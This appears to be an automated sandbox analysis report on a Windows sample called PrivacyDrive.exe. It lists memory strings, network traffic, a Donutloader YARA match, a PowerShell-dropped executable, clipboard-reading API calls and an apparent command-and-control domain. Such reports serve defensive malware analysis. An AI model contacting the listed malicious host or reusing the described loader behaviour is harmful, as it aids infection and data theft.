Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8EemK.wof
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8H-mKpNk.
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v61/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RF
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qE52i1dC.woff2)
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qER2i1dC.woff2)
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEV2i1dC.woff2)
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEl2i1dC.woff2)
Source: chromecache_227.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2)
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_200.1.dr	String found in binary or memory: https://issues.chromium.org/issues/40757070).
Source: chromecache_242.1.dr, chromecache_193.1.dr	String found in binary or memory: https://lens.google.com
Source: chromecache_238.1.dr, chromecache_221.1.dr	String found in binary or memory: https://lens.google.com/gen204
Source: chromecache_200.1.dr	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chromecache_234.1.dr	String found in binary or memory: https://ogs.google.com/
Source: chromecache_200.1.dr	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chromecache_234.1.dr	String found in binary or memory: https://ogs.google.com/widget/callout
Source: chromecache_200.1.dr	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chromecache_200.1.dr	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19037050
Source: chromecache_229.1.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_207.1.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://plus.googleapis.com
Source: chromecache_238.1.dr, chromecache_221.1.dr	String found in binary or memory: https://push.clients6.google.com/upload/
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/
Source: PrivacyDrive.exe, 00000010.00000002.1579442171.0000000001732000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1536061010.000000000172F000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000002.1578947957.0000000001700000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.0000000001700000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api9
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/u
Source: chromecache_234.1.dr	String found in binary or memory: https://ssl.gstatic.com
Source: chromecache_224.1.dr, chromecache_199.1.dr	String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)
Source: chromecache_224.1.dr, chromecache_199.1.dr	String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_white_16dp.png)
Source: chromecache_224.1.dr, chromecache_199.1.dr	String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2-light.png)
Source: chromecache_224.1.dr, chromecache_199.1.dr	String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2.png)
Source: chromecache_238.1.dr, chromecache_221.1.dr	String found in binary or memory: https://support.google.com/
Source: chromecache_242.1.dr, chromecache_193.1.dr	String found in binary or memory: https://support.google.com/websearch/answer/106230
Source: chromecache_225.1.dr, chromecache_242.1.dr, chromecache_193.1.dr, chromecache_220.1.dr	String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: chromecache_214.1.dr, chromecache_204.1.dr	String found in binary or memory: https://use.typekit.net
Source: chromecache_217.1.dr, chromecache_207.1.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521221341.000000000171B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521221341.000000000171B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://www.cybertronsoft.com
Source: chromecache_231.1.dr, chromecache_234.1.dr, chromecache_226.1.dr	String found in binary or memory: https://www.google.com
Source: chromecache_234.1.dr	String found in binary or memory: https://www.google.com"
Source: chromecache_200.1.dr	String found in binary or memory: https://www.google.com/_/og/promos/
Source: chromecache_234.1.dr	String found in binary or memory: https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
Source: chromecache_200.1.dr	String found in binary or memory: https://www.google.com/intl/en/about/products
Source: chromecache_225.1.dr, chromecache_242.1.dr, chromecache_193.1.dr, chromecache_220.1.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: chromecache_238.1.dr, chromecache_221.1.dr	String found in binary or memory: https://www.google.com/tools/feedback
Source: chromecache_234.1.dr	String found in binary or memory: https://www.google.com/url?q
Source: chromecache_200.1.dr	String found in binary or memory: https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_s
Source: chromecache_219.1.dr	String found in binary or memory: https://www.google.com/webhp
Source: chromecache_207.1.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_207.1.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_234.1.dr	String found in binary or memory: https://www.gstatic.com
Source: chromecache_234.1.dr	String found in binary or memory: https://www.gstatic.com/_/boq-one-google/_/r/
Source: chromecache_234.1.dr	String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chromecache_226.1.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chromecache_231.1.dr, chromecache_226.1.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chromecache_200.1.dr	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.RRlsmNlDmQQ.2019.O/rt=j/m=qabr
Source: chromecache_200.1.dr	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.4FdvxZCaxZc.L.W.O/m=qcwid
Source: chromecache_221.1.dr	String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://www.thawte.com/cps0
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: PrivacyDrive.exe.15.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59824
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.85.254:443 -> 192.168.2.16:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.213.254:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49834 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 16_2_059F82A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

16_2_059F82A0

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 16_2_059F82A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

16_2_059F82A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 16_2_0481C583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,

16_2_0481C583

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_0481C583	16_2_0481C583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C055F	16_2_047C055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CC402	16_2_047CC402
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_0481D5C4	16_2_0481D5C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047ED652	16_2_047ED652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047F9792	16_2_047F9792
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047F80E2	16_2_047F80E2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047D31C2	16_2_047D31C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CA252	16_2_047CA252
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_0480C2B2	16_2_0480C2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C5292	16_2_047C5292
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047F8372	16_2_047F8372
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C2CB5	16_2_047C2CB5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047FFCA2	16_2_047FFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C2D5B	16_2_047C2D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_04809DB2	16_2_04809DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C2E1A	16_2_047C2E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C6EFD	16_2_047C6EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CBEE2	16_2_047CBEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C8EB2	16_2_047C8EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C6EB2	16_2_047C6EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C2E8E	16_2_047C2E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CCF72	16_2_047CCF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C2FB3	16_2_047C2FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CE802	16_2_047CE802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C98B2	16_2_047C98B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047EB99B	16_2_047EB99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047F9A42	16_2_047F9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C3A08	16_2_047C3A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CCAE2	16_2_047CCAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047CDA82	16_2_047CDA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047E0B95	16_2_047E0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C15B1	16_2_059C15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059CB570	16_2_059CB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C148C	16_2_059C148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C54B0	16_2_059C54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C74B0	16_2_059C74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C54FB	16_2_059C54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059CA4E0	16_2_059CA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C1418	16_2_059C1418
